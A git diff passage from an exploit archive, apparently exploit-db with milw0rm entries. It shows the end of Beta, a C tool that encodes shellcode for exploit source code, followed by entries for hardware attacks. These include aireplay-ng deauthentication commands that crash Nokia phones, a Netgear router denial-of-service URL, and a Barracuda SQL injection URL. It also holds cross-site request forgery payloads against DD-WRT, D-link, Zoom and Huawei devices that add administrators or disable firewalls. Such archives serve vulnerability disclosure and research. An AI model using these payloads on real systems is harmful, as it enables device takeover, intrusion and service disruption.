marker_length); - if (marker_start == 0) { - printf("- Cannot find start marker.\n"); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - marker_start += marker_length; - // find the second marker - marker_end = find_bytes(marker_start, buffer + buffer_length - marker_start, marker, marker_length); - if (marker_end == 0) { - printf("- Cannot find end marker.\n"); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - if (switch_verbose) printf(" Markers found at ____: byte %d & %d.\n", (int)marker_start - (int)buffer - marker_length, (int)marker_end - (int)buffer); - // copy data between markers to start of buffer; - for (int i = 0; i < (int)marker_end - (int)marker_start; i++) { - buffer[i] = marker_start[i]; - } - buffer_length = (int)marker_end - (int)marker_start; - } - - // Check if we have input data to encode ----------------------------------- - if (buffer_length == 0) { - printf("- No data to encode.\n"); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - if (switch_verbose) printf(" Data length _________: %d bytes.\n", buffer_length); - - // Add some padding -------------------------------------------------------- - if (buffer_length % bytes != 0 && switch_verbose) - printf("* Data padding ________: %d x %02X.\n", bytes - (buffer_length % bytes), pad_byte & 0xff); - while(buffer_length - 1 < MAX_BUFFER_SIZE && buffer_length % bytes != 0) { - buffer[buffer_length] = pad_byte; - buffer_length++; - } - - // Check for bad characters ------------------------------------------------ - for (int i = 0; i < 256; i++) { - if (char_is_bad[i]) { - // For each bad character - bool this_bad_char_found = false; - for (int j = 0; j < buffer_length; j++) { - if (buffer[j] == i) { - // Find all instances in the data - if (this_bad_char_found) printf(", %d", j); - else { - this_bad_char_found = true; - printf("* Bad character %02X at _: %d", i, j); - } - } - } - if (this_bad_char_found) printf(".\n"); - else if (switch_verbose) - printf(" Bad character %02X ____: Not found.\n", i); - } - } - if (switch_encode) { - // Encode the input data --------------------------------------------------- - if (switch_verbose) printf( - "\n" - "_ Encoded data _______________________________________________________________\n" - ); - int input=0, count=0; - // line header and footer only printed when we have a max. chars per line. - if (chars_per_line>0) printf("%s", line_header); - for (int i = 0; i < buffer_length; i+= bytes) { - // read as many bytes as we encode and create one int from them. - unsigned long input = 0; - for (int j = 0; j < bytes; j++) - input += (buffer[i+j] & 0xFF) << (j*8); - // if we've allready printed chars we might have to print seperators - if (i > 0) { - // we have to seperate bytes from each other with this: - printf("%s", byte_seperator); - // if we've allready printed enough chars on this line, end it & start a new one: - if (chars_per_line>0 && i % chars_per_line == 0) - printf("%s%s", line_footer, line_header); - } - // print the byte (with it's own header and footer) and count it. - printf(bytes_format, input); - } - // line header and footer only printed when we have a max. chars per line. - if (chars_per_line>0) printf("%s", footer); - } - if (switch_pause) getchar(); - exit(EXIT_SUCCESS); -} - +/* +______________________________________________________________________________ + + ,sSSSis ,sSSSs, Beta v2.0 (w32). + iS" dP dY" ,SP Encodes binary data to/from a variety of formats. + .SP dSS" ,sS" Copyright (C) 2003-2005 by Berend-Jan Wever + dS' Sb ,sY" + .SP dSSP' sSSSSSSP http://spaces.msn.com/members/berendjanwever +_ iS:_________________________________________________________________________ + + This program is free software; you can redistribute it and/or modify it under + the terms of the GNU General Public License version 2, 1991 as published by + the Free Software Foundation. + + This program is distributed in the hope that it will be useful, but WITHOUT + ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS + FOR A PARTICULAR PURPOSE. See the GNU General Public License for more + details. + + A copy of the GNU General Public License can be found at: + http://www.gnu.org/licenses/gpl.html + or you can write to: + Free Software Foundation, Inc. + 59 Temple Place - Suite 330 + Boston, MA 02111-1307 + USA. +*/ + +#include +#include +#include +#include +#include +#include + +#define MAX_BUFFER_SIZE 0x1000 +#define DEFAULT_PAD_BYTE 0x90 +#define MAX_MARKER_SIZE 0x10 +#define bool char +#define true 1 +#define false 0 + +char* hex = "0123456789abcdef"; + +void version(void) { + printf( + "______________________________________________________________________________\n" + "\n" + " ,sSSSis ,sSSSs, Beta v2.0.\n" + " iS\" dP dY\" ,SP Encodes binary data to/from a variety of formats.\n" + " .SP dSS\" ,sS\" Copyright (C) 2003-2005 by Berend-Jan Wever\n" + " dS' Sb ,sY\" \n" + " .SP dSSP' sSSSSSSP http://spaces.msn.com/members/berendjanwever\n" + "_ iS:_________________________________________________________________________\n" + "\n" + ); + return; +} +void help(void) { + printf( + "Beta was developed to convert raw binary shellcode into text that can be\n" + "used in exploit source-code. It can convert raw binary data to a large\n" + "number of encodings.\n" + "\n" + " Usage: BETA [options] [input file name]\n" + "\n" + " input file name Read input from the given file. By default BETA\n" + " reads input from stdin.\n" + "\n" + "General options:\n" + " --help Display this help and exit\n" + " --version Output version information and exit\n" + " --verbose Displays additional information.\n" + " --pause Wait for keypress before exiting.\n" + "\n" + "Encoding options: (default = AA BB CC ...)\n" + " \\x \\xAA\\xBB\\xCC ...\n" + " 0x 0xAA 0xBB 0xCC ...\n" + " %% %%AA%%BB%%CC...\n" + " # oÞ!...\n" + " %%u %%uBBAA%%uDDCC...\n" + " --noencode Don't encode (only do checks).\n" + "\n" + "Layout options: (default = none)\n" + " --chars/line=X Output a new line after every X encoded bytes.\n" + " --quotes Wrap output in quotes. Only usefull in combination\n" + " with chars/line argument.\n" + " --quotesplus Wrap output in quotes and add a '+' at the end\n" + " of each line. Only usefull in combination with\n" + " chars/line argument.\n" + " --spaces Seperate encoding entities by spaces.\n" + " --commas Seperate encoding entities by commas and spaces.\n" + "\n" + "Additional options:\n" + " --padbyte=AA When using a multibyte encoding (e.g. %%uXXXX)\n" + " the data might need some padding. The given byte\n" + " will be used, the default value is %02x.\n" + " --badbytes[=AA[,BB[...]]] Check the input for presence of the given char-\n" + " acters and report where they are found. You can\n" + " supply a comma seperated list of hexadecimal\n" + " character codes and the keywords \"alpha\" and\n" + " \"print\" (to check for the presence of nonalpha-\n" + " numeric or non-printable characters). If no char-\n" + " acters are supplied, the input will be checked for\n" + " the presence of 00, 0A and 0D. \n" + " --marker[=AA[,BB[...]]] The input contains both garbage and data. The data\n" + " is wrapped by the marker bytes, everything before\n" + " the first set and after the last set of marker\n" + " bytes will be ignored. If no marker bytes are\n" + " supplied, \"CC CC CC\" (3xInt3) will be used.\n" + " You can supply up to %d bytes as marker.\n", + DEFAULT_PAD_BYTE, MAX_MARKER_SIZE + ); + return; +} + +// Find a set of bytes in another set of bytes +char* find_bytes(char* haystack, int haystack_length, char* needle, int needle_length) { + int needle_start = -1, needle_checked = 1; + do { + if (haystack[needle_start+needle_checked] == needle[needle_checked]) + // Yes, bytes match, check next byte of needle + needle_checked++; + else { + // No, no match, check next byte of haystack + needle_start++; + needle_checked = 0; + } + if (needle_start + needle_length > haystack_length) + // Not found. + return 0; + } while (needle_checked != needle_length); + // Found! + return haystack + needle_start; +} + +int main(int argc, char** argv, char** envp) { + + // This will contain the input data + char* buffer; + int buffer_length = 0; + + // This will contain the marker + char marker[MAX_MARKER_SIZE]; + int marker_length = 0; + + // This will keep track of all "bad" bytes + char char_is_bad[0x100]; + for (int i = 0; i < sizeof(char_is_bad)/sizeof(*char_is_bad); i++) + char_is_bad[i] = false; + + // These will store some values supplied by command line arguments + bool switch_verbose = false, switch_encode = true, switch_pause = false; + char pad_byte = DEFAULT_PAD_BYTE; + int chars_per_line = -1; + char *input_filename = 0; + char *line_header = "", *line_footer = "\n", *footer = "\n"; + char *bytes_format = "%02X", *byte_seperator = ""; + int bytes = 1; + + //-------------------------------------------------------------------------- + // Read and handle arguments + for (int argn = 1; argn < argc; argn++) { + //--help --------------------------------------------------------------- + if (stricmp(argv[argn], "--help") == 0) { + version(); + help(); + if (switch_pause) getchar(); + exit(EXIT_SUCCESS); + //--version ------------------------------------------------------------ + } else if (stricmp(argv[argn], "--version") == 0) { + version(); + if (switch_pause) getchar(); + exit(EXIT_SUCCESS); + //--verbose ------------------------------------------------------------ + } else if (stricmp(argv[argn], "--verbose") == 0) { + switch_verbose = true; + //--noencode ----------------------------------------------------------- + } else if (stricmp(argv[argn], "--noencode") == 0) { + switch_encode = false; + //--noencode ----------------------------------------------------------- + } else if (stricmp(argv[argn], "--pause") == 0) { + switch_pause = true; + //--chars/line= -------------------------------------------------------- + } else if (strnicmp(argv[argn], "--chars/line=", 13)==0) { + if ((chars_per_line = strtol(&(argv[argn][13]), NULL, 10)) < 1) { + printf("Illegal number of characters per line: \"%s\".\n", &(argv[argn][13])); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + //--layout options ----------------------------------------------------- + } else if (strcmp(argv[argn], "--quote") == 0 || strcmp(argv[argn], "--quotes") == 0) { + line_header = "\""; + line_footer = "\"\n"; + footer = "\"\n"; + } else if (strcmp(argv[argn], "--quoteplus") == 0 || strcmp(argv[argn], "--quotesplus") == 0) { + line_header = "\""; + line_footer = "\" +\n"; + footer = "\"\n"; + } else if (strcmp(argv[argn], "--comma") == 0 || strcmp(argv[argn], "--commas") == 0) { + byte_seperator = ", "; + } else if (strcmp(argv[argn], "--space") == 0 || strcmp(argv[argn], "--spaces") == 0) { + byte_seperator = " "; + //--encoding options --------------------------------------------------- + } else if (stricmp(argv[argn], "\\x")==0) { + bytes_format = "\\x%02X"; + } else if (stricmp(argv[argn], "0x")==0) { + bytes_format = "0x%02X"; + } else if (stricmp(argv[argn], "#")==0) { + bytes_format = "&#%d;"; + } else if (stricmp(argv[argn], "%")==0) { + bytes_format = "%%%02X"; + } else if (stricmp(argv[argn], "%u")==0) { + bytes_format = "%%u%04X"; + bytes = 2; + //--padbyte ------------------------------------------------------------ + } else if (strnicmp(argv[argn], "--padbyte=", 10) == 0) { + char* next_xarg; + pad_byte = strtol(&(argv[argn][10]), &next_xarg, 0x10); + if ((pad_byte & 0xFF) != pad_byte) { + printf("Incorrect value in padbyte argument: \"%s\".\n", &(argv[argn][11])); + printf(" Value cannot be converted to a byte "); + for (int i = 0; i < strlen(&(argv[argn][10])); i++) + printf("^"); + printf("\n"); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + if (next_xarg == &(argv[argn][10])) { + printf("Incorrect byte encoding in padbyte argument: \"%s\".\n", &(argv[argn][10])); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + //--badbytes ----------------------------------------------------------- + } else if (stricmp(argv[argn], "--badbytes") == 0) { + char_is_bad[0x0] = true; + char_is_bad[0xA] = true; + char_is_bad[0xD] = true; + //--badbytes=XX,XX,... ------------------------------------------------- + } else if (strnicmp(argv[argn], "--badbytes=", 11) == 0) { + char* xarg = &(argv[argn][11]); + while (strlen(xarg) > 0) { + if (strnicmp(xarg, "alpha", 5) == 0) { + for (int i = 0; i < 0x100; i++) { + if (!isalnum(i)) char_is_bad[i] = true; + } + xarg += 5; + } else if (strnicmp(xarg, "print", 5) == 0) { + for (int i = 0; i < 0x100; i++) { + if (!isprint(i)) char_is_bad[i] = true; + } + xarg += 5; + } else { + char* next_xarg; + int decoded = strtol(xarg, &next_xarg, 0x10); + if ((decoded & 0xFF) != decoded) { + printf("Incorrect value in badbytes argument: \"%s\".\n", &(argv[argn][11])); + for (char* i = &(argv[argn][9]); i < xarg; i++) + printf(" "); + printf(" Value cannot be converted to a byte "); + for (char* i = xarg; i < next_xarg; i++) + printf("^"); + printf("\n"); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + if (next_xarg == xarg) { + printf("Incorrect byte encoding in badbytes argument: \"%s\".\n", &(argv[argn][11])); + for (char* i = &(argv[argn][11]); i < xarg; i++) + printf(" "); + printf(" Character '%c' not expected ^\n", *xarg); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + + char_is_bad[decoded] = true; + xarg = next_xarg; + } + if (*xarg == ',') xarg++; + } + //--marker ------------------------------------------------------------- + } else if (stricmp(argv[argn], "--marker")==0) { + marker_length = 3; + for (int i = 0; i < marker_length; i++) marker[i] = 0xCC; + //--marker= ------------------------------------------------------------ + } else if (strnicmp(argv[argn], "--marker=", 9)==0) { + char* xarg = &(argv[argn][9]); + while (strlen(xarg) > 0) { + if (marker_length == MAX_MARKER_SIZE) { + printf("Given marker is too large, the maximum size is %d characters.\n", MAX_MARKER_SIZE); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + char* next_xarg; + int decoded = strtol(xarg, &next_xarg, 0x10); + if ((decoded & 0xFF) != decoded) { + printf("Incorrect value in marker argument: \"%s\".\n", &(argv[argn][9])); + for (char* i = &(argv[argn][9]); i < xarg; i++) + printf(" "); + printf(" Value cannot be converted to a byte "); + for (char* i = xarg; i < next_xarg; i++) + printf("^"); + printf("\n"); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + marker[marker_length] = decoded; + marker_length++; + if (next_xarg == xarg) { + printf("Incorrect byte encoding in marker argument: \"%s\".\n", &(argv[argn][9])); + for (char* i = &(argv[argn][9]); i < xarg; i++) + printf(" "); + printf(" Character '%c' not expected ^\n", *xarg); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + xarg = next_xarg; + if (*xarg == ',') xarg ++; + } + } else { + //--input filename ----------------------------------------------------- + if (input_filename != 0) { + printf( + "Two arguments are assumed to be file names, only one was expected:\n" + "\"%s\" and \"%s\"\n", + input_filename, argv[argn] + ); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + input_filename = argv[argn]; + } + } + + if (switch_verbose) version(); + + if (input_filename == 0) { + // Read from STDIN ----------------------------------------------------- + buffer = malloc(MAX_BUFFER_SIZE); + if (buffer == 0) { + printf("- Cannot allocate %d bytes of memory for input buffer.\n", MAX_BUFFER_SIZE); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + if (switch_verbose) printf(" Input _______________: STDIN, reading..."); + while (buffer_length < MAX_BUFFER_SIZE && (buffer[buffer_length] = getchar()) != EOF) buffer_length++; + if (switch_verbose) { + if (buffer_length == MAX_BUFFER_SIZE) + printf("\r Input _______________: STDIN, %d bytes (maximum size for input data).\n", buffer_length); + else + printf("\r Input _______________: STDIN, %d bytes.\n", buffer_length); + } + } else { + // Read from file ------------------------------------------------------ + int input_filedescriptor = 0; + if ((input_filedescriptor = open(input_filename, O_RDONLY | O_BINARY, 0)) == 0) { + printf("- Cannot open file \"%s\".\n", input_filename); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + if ((buffer_length = lseek(input_filedescriptor, 0, SEEK_END)) == -1) { + printf("- Cannot find end of file \"%s\".\n", input_filename); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + if (buffer_length == 0) { + printf("- File \"%s\" is empty.\n", input_filename); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + if (lseek(input_filedescriptor, 0, SEEK_SET) == -1) { + printf("- Cannot find start of file \"%s\".\n", input_filename); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + if (switch_verbose) printf(" Input file __________: \"%s\", %d bytes.\n", input_filename, buffer_length); + if ((buffer = malloc(buffer_length)) == 0) { + printf("- Cannot allocate %d bytes of memory for input buffer.\n", buffer_length); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + int bytes_read_total = 0; + while (bytes_read_total < buffer_length) { + int bytes_read = read(input_filedescriptor, buffer+bytes_read_total, buffer_length-bytes_read_total); + if (bytes_read == -1) { + printf("- Cannot read from file \"%s\".\n", input_filename); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + if (bytes_read == 0) { + printf("- Cannot read more then %d bytes of file \"%s\".\n", bytes_read_total, input_filename); + buffer_length = bytes_read_total; + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + bytes_read_total += bytes_read; + } + close(input_filedescriptor); + } + + // Cut out the part surrounded by the markers ------------------------------ + if (marker_length > 0) { + if (switch_verbose) { + printf (" Marker bytes ________:"); + for (int i = 0; i < marker_length; i++) + printf(" %02X", marker[i] & 0xFF); + printf (".\n"); + } + char *marker_start, *marker_end; + // find the first marker + marker_start = find_bytes(buffer, buffer_length, marker, marker_length); + if (marker_start == 0) { + printf("- Cannot find start marker.\n"); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + marker_start += marker_length; + // find the second marker + marker_end = find_bytes(marker_start, buffer + buffer_length - marker_start, marker, marker_length); + if (marker_end == 0) { + printf("- Cannot find end marker.\n"); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + if (switch_verbose) printf(" Markers found at ____: byte %d & %d.\n", (int)marker_start - (int)buffer - marker_length, (int)marker_end - (int)buffer); + // copy data between markers to start of buffer; + for (int i = 0; i < (int)marker_end - (int)marker_start; i++) { + buffer[i] = marker_start[i]; + } + buffer_length = (int)marker_end - (int)marker_start; + } + + // Check if we have input data to encode ----------------------------------- + if (buffer_length == 0) { + printf("- No data to encode.\n"); + if (switch_pause) getchar(); + exit(EXIT_FAILURE); + } + if (switch_verbose) printf(" Data length _________: %d bytes.\n", buffer_length); + + // Add some padding -------------------------------------------------------- + if (buffer_length % bytes != 0 && switch_verbose) + printf("* Data padding ________: %d x %02X.\n", bytes - (buffer_length % bytes), pad_byte & 0xff); + while(buffer_length - 1 < MAX_BUFFER_SIZE && buffer_length % bytes != 0) { + buffer[buffer_length] = pad_byte; + buffer_length++; + } + + // Check for bad characters ------------------------------------------------ + for (int i = 0; i < 256; i++) { + if (char_is_bad[i]) { + // For each bad character + bool this_bad_char_found = false; + for (int j = 0; j < buffer_length; j++) { + if (buffer[j] == i) { + // Find all instances in the data + if (this_bad_char_found) printf(", %d", j); + else { + this_bad_char_found = true; + printf("* Bad character %02X at _: %d", i, j); + } + } + } + if (this_bad_char_found) printf(".\n"); + else if (switch_verbose) + printf(" Bad character %02X ____: Not found.\n", i); + } + } + if (switch_encode) { + // Encode the input data --------------------------------------------------- + if (switch_verbose) printf( + "\n" + "_ Encoded data _______________________________________________________________\n" + ); + int input=0, count=0; + // line header and footer only printed when we have a max. chars per line. + if (chars_per_line>0) printf("%s", line_header); + for (int i = 0; i < buffer_length; i+= bytes) { + // read as many bytes as we encode and create one int from them. + unsigned long input = 0; + for (int j = 0; j < bytes; j++) + input += (buffer[i+j] & 0xFF) << (j*8); + // if we've allready printed chars we might have to print seperators + if (i > 0) { + // we have to seperate bytes from each other with this: + printf("%s", byte_seperator); + // if we've allready printed enough chars on this line, end it & start a new one: + if (chars_per_line>0 && i % chars_per_line == 0) + printf("%s%s", line_footer, line_header); + } + // print the byte (with it's own header and footer) and count it. + printf(bytes_format, input); + } + // line header and footer only printed when we have a max. chars per line. + if (chars_per_line>0) printf("%s", footer); + } + if (switch_pause) getchar(); + exit(EXIT_SUCCESS); +} + // milw0rm.com [2005-12-16] \ No newline at end of file diff --git a/platforms/hardware/dos/6459.txt b/platforms/hardware/dos/6459.txt index 60c531d0f..98e83f644 100755 --- a/platforms/hardware/dos/6459.txt +++ b/platforms/hardware/dos/6459.txt @@ -1,29 +1,29 @@ -Nokia E90 and probably other devices with s60v3 crashes with aireplay - -The device should be authorised on an access point - -sample: aireplay-ng -0 10 -a 00:74:3B:0C:A0:5A -c 00:2A:29:F3:1F:42 wlan0 - -My HW: - -AP= Acorp w422g - -Nokia E90 v 07.40.1.2 Ra-6 - -For attack realisation is necessary to send DeAuth a package on the attacked -device (to throw out it from an access point), then to continue to send -packages on the device. - -the Device is crashed off right after repeated authorisation on an access -point - -Vulnerability is fast shown at activity on WLAN - -WLAN Settings: auto - -I specify a harmful code: ./aireplay-ng -x 1024 -0 230 -a $ap -c $target -$iface - -Added: the vulnerable device: Nokia N82 - -# milw0rm.com [2008-09-14] +Nokia E90 and probably other devices with s60v3 crashes with aireplay + +The device should be authorised on an access point + +sample: aireplay-ng -0 10 -a 00:74:3B:0C:A0:5A -c 00:2A:29:F3:1F:42 wlan0 + +My HW: + +AP= Acorp w422g + +Nokia E90 v 07.40.1.2 Ra-6 + +For attack realisation is necessary to send DeAuth a package on the attacked +device (to throw out it from an access point), then to continue to send +packages on the device. + +the Device is crashed off right after repeated authorisation on an access +point + +Vulnerability is fast shown at activity on WLAN + +WLAN Settings: auto + +I specify a harmful code: ./aireplay-ng -x 1024 -0 230 -a $ap -c $target +$iface + +Added: the vulnerable device: Nokia N82 + +# milw0rm.com [2008-09-14] diff --git a/platforms/hardware/dos/8106.txt b/platforms/hardware/dos/8106.txt index 87092c6da..a598bc7f8 100755 --- a/platforms/hardware/dos/8106.txt +++ b/platforms/hardware/dos/8106.txt @@ -1,17 +1,17 @@ -LUNOSEC ADVISORY - -Synopsis: Denial of Service condition in Netgear's WGR614v9 Wireless Router - -Firmware version tested: v1.2.2_14.0.13NA (LATEST) -Firmware version tested: WNR834Bv2 v2.0.8_2.0.8 # GTADarkDude tested - -Proof of Concept: - -Appending a question mark to the router's internal IP address after -the forward slash. e.g., http://192.168.1.1/? results in a denial of -service condition where the http server dies and the administrative -interface is no longer available until after a device reboot. - -found: fabrizio siciliano (staticrez) - -# milw0rm.com [2009-02-25] +LUNOSEC ADVISORY + +Synopsis: Denial of Service condition in Netgear's WGR614v9 Wireless Router + +Firmware version tested: v1.2.2_14.0.13NA (LATEST) +Firmware version tested: WNR834Bv2 v2.0.8_2.0.8 # GTADarkDude tested + +Proof of Concept: + +Appending a question mark to the router's internal IP address after +the forward slash. e.g., http://192.168.1.1/? results in a denial of +service condition where the http server dies and the administrative +interface is no longer available until after a device reboot. + +found: fabrizio siciliano (staticrez) + +# milw0rm.com [2009-02-25] diff --git a/platforms/hardware/remote/7389.htm b/platforms/hardware/remote/7389.htm index 300bf19b0..810c4928b 100755 --- a/platforms/hardware/remote/7389.htm +++ b/platforms/hardware/remote/7389.htm @@ -1,93 +1,93 @@ -Remote root dd-wrt --------------------------------------------------------------------------------- - -Written by Michael Brooks -Special thanks to str0ke - -Exploits tested on the newist stable version: -Firmware: DD-WRT v24-sp1 (07/27/08) micro -Product Homepage: -http://dd-wrt.com/ - -Impact: -1)Remote root command execuiton /bin/sh -2)Change web administration password and enable remote admistration -3)create new Port Forwarding rules to byass NAT. - - - - - - Remote root command execution /bin/sh -
- - - - - - - -


- enable remote administration and change login to root:password -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


- Change Port Forwarding to byass NAT protection. -
- - - - - - - - - - - - - - - - - -
- - - -# milw0rm.com [2008-12-08] +Remote root dd-wrt +-------------------------------------------------------------------------------- + +Written by Michael Brooks +Special thanks to str0ke + +Exploits tested on the newist stable version: +Firmware: DD-WRT v24-sp1 (07/27/08) micro +Product Homepage: +http://dd-wrt.com/ + +Impact: +1)Remote root command execuiton /bin/sh +2)Change web administration password and enable remote admistration +3)create new Port Forwarding rules to byass NAT. + + + + + + Remote root command execution /bin/sh +
+ + + + + + + +


+ enable remote administration and change login to root:password +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +


+ Change Port Forwarding to byass NAT protection. +
+ + + + + + + + + + + + + + + + + +
+ + + +# milw0rm.com [2008-12-08] diff --git a/platforms/hardware/remote/7496.txt b/platforms/hardware/remote/7496.txt index 0f8586c87..6241fc955 100755 --- a/platforms/hardware/remote/7496.txt +++ b/platforms/hardware/remote/7496.txt @@ -1,68 +1,68 @@ -CVE Number: CVE-2008-1094 -Vulnerability: SQL Injection -Risk: Medium -Attack vector: From Remote - -Vulnerability Discovered: 16th June 2008 -Vendor Notified: 16th June 2008 -Advisory Released: 15th December 2008 - - -Abstract - -Barracuda Networks Spam Firewall is vulnerable to various SQL Injection attacks. -When exploited by an authenticated user, the identified vulnerability can lead to -Denial of Service, Database Information Disclosure, etc. - - -Description - -The index.cgi resource was identified as being susceptible to SQL Injection attacks. -When filtering user accounts in Users->Account View section, the pattern_x parameter -(where x = 0..n) allows inserting arbitrary SQL code once filter_x parameter is set -to search_count_equals‘ value. - -/cgi-bin/index.cgi?&user=&password=&et=&auth_type=Local&locale=en_US&realm=&primary_tab=USERS&secondary_tab=per_user_account_view&boolean_0=boolean_and&filter_0=search_count_equals&pattern_0=if(database() like concat(char(99),char(37)),5,0) - -An attacker can exploit this vulnerability by injecting arbitrary SQL code to be -executed as part of the SQL query. - - -Original Advisory: - -http://dcsl.ul.ie/advisories/02.htm - - -Barracuda Networks Technical Alert - -http://www.barracudanetworks.com/ns/support/tech_alert.php - - -Affected Versions - -Barracuda Spam Firewall (Firmware v3.5.11.020, Model 600) - -Other products/versions might be affected. - - -Mitigation - -Vendor recommends to the following firmware version - -Barracuda Spam Firewall (Firmware v3.5.12.001) - -Alternatively, please contact Barracuda Networks for technical support. - - -Credits - -Dr. Marian Ventuneac, marian.ventuneac@ul.ie -Data Communication Security Laboratory, Department of Electronic & Computer Engineering, University of Limerick - - -Disclaimer - -Data Communication Security Laboratory releases this information with the vendor acceptance. -DCSL is not responsible for any malicious application of the information presented in this advisory. - -# milw0rm.com [2008-12-16] +CVE Number: CVE-2008-1094 +Vulnerability: SQL Injection +Risk: Medium +Attack vector: From Remote + +Vulnerability Discovered: 16th June 2008 +Vendor Notified: 16th June 2008 +Advisory Released: 15th December 2008 + + +Abstract + +Barracuda Networks Spam Firewall is vulnerable to various SQL Injection attacks. +When exploited by an authenticated user, the identified vulnerability can lead to +Denial of Service, Database Information Disclosure, etc. + + +Description + +The index.cgi resource was identified as being susceptible to SQL Injection attacks. +When filtering user accounts in Users->Account View section, the pattern_x parameter +(where x = 0..n) allows inserting arbitrary SQL code once filter_x parameter is set +to search_count_equals‘ value. + +/cgi-bin/index.cgi?&user=&password=&et=&auth_type=Local&locale=en_US&realm=&primary_tab=USERS&secondary_tab=per_user_account_view&boolean_0=boolean_and&filter_0=search_count_equals&pattern_0=if(database() like concat(char(99),char(37)),5,0) + +An attacker can exploit this vulnerability by injecting arbitrary SQL code to be +executed as part of the SQL query. + + +Original Advisory: + +http://dcsl.ul.ie/advisories/02.htm + + +Barracuda Networks Technical Alert + +http://www.barracudanetworks.com/ns/support/tech_alert.php + + +Affected Versions + +Barracuda Spam Firewall (Firmware v3.5.11.020, Model 600) + +Other products/versions might be affected. + + +Mitigation + +Vendor recommends to the following firmware version + +Barracuda Spam Firewall (Firmware v3.5.12.001) + +Alternatively, please contact Barracuda Networks for technical support. + + +Credits + +Dr. Marian Ventuneac, marian.ventuneac@ul.ie +Data Communication Security Laboratory, Department of Electronic & Computer Engineering, University of Limerick + + +Disclaimer + +Data Communication Security Laboratory releases this information with the vendor acceptance. +DCSL is not responsible for any malicious application of the information presented in this advisory. + +# milw0rm.com [2008-12-16] diff --git a/platforms/hardware/remote/7920.txt b/platforms/hardware/remote/7920.txt index dc51fa98b..7a0bf6bea 100755 --- a/platforms/hardware/remote/7920.txt +++ b/platforms/hardware/remote/7920.txt @@ -1,23 +1,23 @@ -D-link VoIP Phone Adapter XSS and XSRF(remote firmware overwrite) -model number: DVG-2001s -f/w version 1.00.007 - -Better than just remote code execution, you control the firmware. - - -
- - - - - - - - -
- -and xss which can be used for csrf bypass: -http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscript%3Ealert(%22hacked%22)%3C/script%3E - -# milw0rm.com [2009-01-29] +D-link VoIP Phone Adapter XSS and XSRF(remote firmware overwrite) +model number: DVG-2001s +f/w version 1.00.007 + +Better than just remote code execution, you control the firmware. + + +
+ + + + + + + + +
+ +and xss which can be used for csrf bypass: +http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscript%3Ealert(%22hacked%22)%3C/script%3E + +# milw0rm.com [2009-01-29] diff --git a/platforms/hardware/remote/7921.txt b/platforms/hardware/remote/7921.txt index 2835688e4..0d8f40967 100755 --- a/platforms/hardware/remote/7921.txt +++ b/platforms/hardware/remote/7921.txt @@ -1,25 +1,25 @@ -Written By Michael Brooks -Special thanks to str0ke! - -Zoom VoIP Phone Adapater ATA1+1 XSRF -voip provider change xsrf -version 1.2.5 - -
- - - - - - - - - - - - - -
- - -# milw0rm.com [2009-01-29] +Written By Michael Brooks +Special thanks to str0ke! + +Zoom VoIP Phone Adapater ATA1+1 XSRF +voip provider change xsrf +version 1.2.5 + +
+ + + + + + + + + + + + + +
+ + +# milw0rm.com [2009-01-29] diff --git a/platforms/hardware/remote/9503.txt b/platforms/hardware/remote/9503.txt index 1a0ec6fd9..eb089add6 100755 --- a/platforms/hardware/remote/9503.txt +++ b/platforms/hardware/remote/9503.txt @@ -1,37 +1,37 @@ -Description: -Huawei MT880 is a device offered by the algerian telecom operator - -FAWRI, to provide ADSL Internet connexion and it's already widely in use. -Overview: -Huawei MT880 firmware and its default configuration has flaws, which -allows LAN users to gain unauthorized full access to device. - -Here are just limited PoCs. - -Default credentials on the web-based management interface: - -admin/admin - -Possible XSRFs: - -Adding an administrator user: -http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70 - - -Disabling firewall/anti-DoS... features: -http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70 - - -Adding a MAC address to the whitelist: -http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104 - - -Adding an IP address allowed by the firewall: -http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7 - - -Over flaws are not 